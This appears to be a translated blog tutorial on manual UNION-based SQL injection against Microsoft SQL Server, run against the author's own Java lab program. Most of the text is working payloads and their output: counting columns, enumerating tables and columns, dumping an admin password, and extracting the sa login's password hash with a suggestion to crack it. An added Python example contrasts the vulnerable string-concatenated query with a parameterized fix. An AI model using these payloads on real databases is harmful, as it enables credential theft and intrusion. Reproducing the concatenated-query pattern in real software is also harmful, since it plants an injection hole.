Following on from the previous post, "MySQL manual injection".
References: http://hi.baidu.com/ciqing_s/item/971bf994365130accc80e5ed
http://hi.baidu.com/moon4ins/item/ed3b181ae472cce139cb30c4
Prerequisites:
MSSQL comment markers: // or -- (the examples below use --)
That is, everything after either marker is ignored by the server.
Environment:
The code is the same as before:
import java.sql.SQLException;

public class TestSql {
    public static void main(String[] args) throws InstantiationException,
            IllegalAccessException, ClassNotFoundException, SQLException {
        // DateExecute is the author's JDBC helper class from the previous post
        DateExecute de = new DateExecute("MSSQL", "sa", "xxxxxxx", "school");
        String name = "mynona";
        String address = "gdut";
        // the injected value used in the last step of this post
        name = "mynona' and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--";
        // the query is built by string concatenation, so name and address become part of the SQL text
        String sql = "select * from student where name = '" + name + "' and address = '" + address + "'";
        //sql = "select name, password_hash from sys.sql_logins";
        System.out.println("執行sql:");
        System.out.println(sql);
        System.out.println("輸出結果:");
        System.out.println(de.getDateList(sql));
    }
}
Database:
Target:
Looking at the views, they are very similar to MySQL's.
You can see the INFORMATION_SCHEMA.TABLES and INFORMATION_SCHEMA.COLUMNS views.
So we can use exactly the same method as in the MySQL manual injection post.
Further down in the views above:
Our target is the name and password in that table above.
Find the number of columns in the current select:
name = "mynona' order by 1--"; ok
name = "mynona' order by 2--"; ok
name = "mynona' order by 3--"; ok
name = "mynona' order by 4--"; error
So the current select statement has 3 columns.
Dump the database name:
name = "mynona' and 1=2 union select 1,db_name(),3--";
Executed SQL:
select * from student where name = 'mynona' and 1=2 union select 1,db_name(),3--' and address = 'gdut'
Output:
[{id=1, address=3, name=school}]
So the database name is school.
Enumerate the tables of the current database:
name = "mynona' and 1=2 union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES--";
Executed SQL:
select * from student where name = 'mynona' and 1=2 union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES--' and address = 'gdut'
Output:
[{id=1, address=admin, name=2}, {id=1, address=student, name=2}, {id=1, address=sysdiagrams, name=2}]
So the tables are: admin, student, sysdiagrams.
Enumerate the columns of the admin table:
name = "mynona' and 1=2 union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'admin'--";
Executed SQL:
select * from student where name = 'mynona' and 1=2 union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'admin'--' and address = 'gdut'
Output:
[{id=1, address=id, name=2}, {id=1, address=name, name=2}, {id=1, address=password, name=2}]
So the columns of table admin are: id, name, password.
Dump the data of the admin table:
name = "mynona' union select id, name, password from admin--";
Executed SQL:
select * from student where name = 'mynona' union select id, name, password from admin--' and address = 'gdut'
Output:
[{id=1, address=mynona, name=admin}, {id=1, address=gdut, name=mynona}]
That is, the admin row is id=1, name=admin, password=mynona (the password column lands in the address field of the result).
Dump the sys.sql_logins table:
name = "mynona' and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--";
Executed SQL:
select * from student where name = 'mynona' and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--' and address = 'gdut'
Output:
[{id=1, address=0x010056049b0eb602873b079baee778daa3ecc4fdba7447797d6a, name=sa}, {id=1, address=0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f, name=##MS_PolicyEventProcessingLogin##}, {id=1, address=0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f, name=##MS_PolicyTsqlExecutionLogin##}]
So the password_hash of user sa is 0x010056049b0eb602873b079baee778daa3ecc4fdba7447797d6a.
Crack this hash and you get the sa password.
Download link for the source files and test project of this post and the previous one:
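Added example, not the post's own code: a self-contained Python/sqlite3 stand-in for the TestSql program above, with the student and admin tables constructed in memory. It runs the post's admin-table payload through the same string concatenation and through a parameterized query, which is the fix: with bound parameters the quote, UNION and -- are just characters of the name value and never reach the SQL parser.

```python
import sqlite3

# Payload taken from the post (admin table dump step).
PAYLOAD = "mynona' union select id, name, password from admin--"


def setup_db():
    """Constructed in-memory stand-in for the post's 'school' database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE student (id INTEGER, name TEXT, address TEXT)")
    conn.execute("CREATE TABLE admin (id INTEGER, name TEXT, password TEXT)")
    conn.execute("INSERT INTO student VALUES (1, 'mynona', 'gdut')")
    conn.execute("INSERT INTO admin VALUES (1, 'admin', 'mynona')")
    return conn


def lookup_vulnerable(conn, name, address):
    """Same string concatenation as TestSql: the input becomes SQL syntax."""
    sql = ("select * from student where name = '" + name
           + "' and address = '" + address + "'")
    # The trailing -- comments out "' and address = 'gdut'", so the statement
    # stays well-formed and the UNION appends admin rows to the result set.
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name, address):
    """Parameterized form: the driver binds the values, nothing is parsed as SQL."""
    sql = "select * from student where name = ? and address = ?"
    return conn.execute(sql, (name, address)).fetchall()


if __name__ == "__main__":
    db = setup_db()
    print("concatenated:", lookup_vulnerable(db, PAYLOAD, "gdut"))
    print("parameterized:", lookup_safe(db, PAYLOAD, "gdut"))
```

The concatenated query returns the admin row (1, 'admin', 'mynona') alongside the real student row; the parameterized query returns nothing, because no student is literally named after the payload.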